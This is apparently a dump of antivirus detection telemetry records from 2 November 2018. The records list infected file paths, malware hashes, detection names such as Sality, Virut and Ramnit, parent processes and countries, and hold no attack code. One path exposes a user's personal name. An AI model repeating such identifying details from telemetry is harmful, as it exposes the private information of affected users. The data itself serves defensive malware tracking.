  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-07-05-09.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T15:15:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe185_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe185 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T20:03:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2de2187224feda579125dc15840138845305e6ffd6aa64b56b8ec772ed353152', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2DE2187224FEDA579125DC15840138845305E6FFD6AA64B56B8EC772ED353152', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='2de2187224feda579125dc15840138845305e6ffd6aa64b56b8ec772ed353152', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:03:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-07-20-56.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-30T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T04:50:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='139a13c219002d6ac29923247efef74a7f71643514b56196ec29e55b538062b4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\139A13C219002D6AC29923247EFEF74A7F71643514B56196EC29E55B538062B4', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='139a13c219002d6ac29923247efef74a7f71643514b56196ec29e55b538062b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:22:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:09:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:04:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3420000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='043c093bb240921744cb23205229e70e67de05261e76bfa4a044fdb497d69336', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:58:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005821-ccb67faa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005821-CCB67FAA', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0125811.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0125811.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134404-950d0c11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134404-950D0C11', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='E:\\Download\\ANSYS Fluent 2\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='E:\\Download\\ANSYS Fluent 2\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T06:35:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102804-52b033c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d543351\\AVSCAN-20181102-102641-490633FA\\AVSCAN-20181102-102804-52B033C6', filesize=1600000, name='Adware/DealPly.bqeij.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:28:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-072314-aa0d6b35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_456596c3\\AVSCAN-20181102-072257-A7ED4A92\\AVSCAN-20181102-072314-AA0D6B35', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='1ad3dc1b91444427813e416a12f0860a4dac55c14cf561e4df068c60bc6b2206', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:23:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='terminator.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\terminator\\terminator.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3b655afe1123a2f32bdeae96a31f21d6036c08cfb2b9859f69cbb52f89580b4b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T20:30:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120434-2a08d1f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6cd8729\\AVSCAN-20181102-120406-257538A2\\AVSCAN-20181102-120434-2A08D1F5', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052256-531d1da1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052256-531D1DA1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maps.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\MAPS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052838-1f746371', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052838-1F746371', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053128-8488efed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053128-8488EFED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-232430-1a810448', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d9d377eb\\AVSCAN-20181102-232247-109E1FB5\\AVSCAN-20181102-232430-1A810448', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:26:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hotel.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\HOTEL\\HOTEL.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160409-1a84ea77', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-160409-1A84EA77', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:07:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T17:30:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100227-bba922b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03aa77bb\\AVSCAN-20181102-100026-ACE63AD3\\AVSCAN-20181102-100227-BBA922B6', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:02:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='samp-server.exe', filepath='D:\\Games\\samp-server.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='48a4dba98cbe22be684c6cd6f5b8ccc44b53cf9276b939cb947184288be56b41', metadata=Row(cmdline='mmbb5544 37343235303338363839393536313531393231 58', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='F:\\WolfTeamAS\\Wolfteam.bin', parentsize=7464104, timestamp='2018-11-02T15:01:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054002-b6ee078e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054002-B6EE078E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050400-ae677d44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050400-AE677D44', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdgenxferfsys.dll', filepath='\\\\?\\C:\\Program Files\\Real\\RealPlayer\\Plugins\\pdgenxferfsys.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='4a98d471a52c6e6ace48ad5037ad7f2afe08881fab43781d2290ef802e58f2c2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:42:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-043350-3cccd6bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7b6e3b0e\\AVSCAN-20181102-043316-371CFA1C\\AVSCAN-20181102-043350-3CCCD6BD', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:37:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.251\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.251\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T00:05:51Z'), dt=datetime.date(2018, 11, 2)),
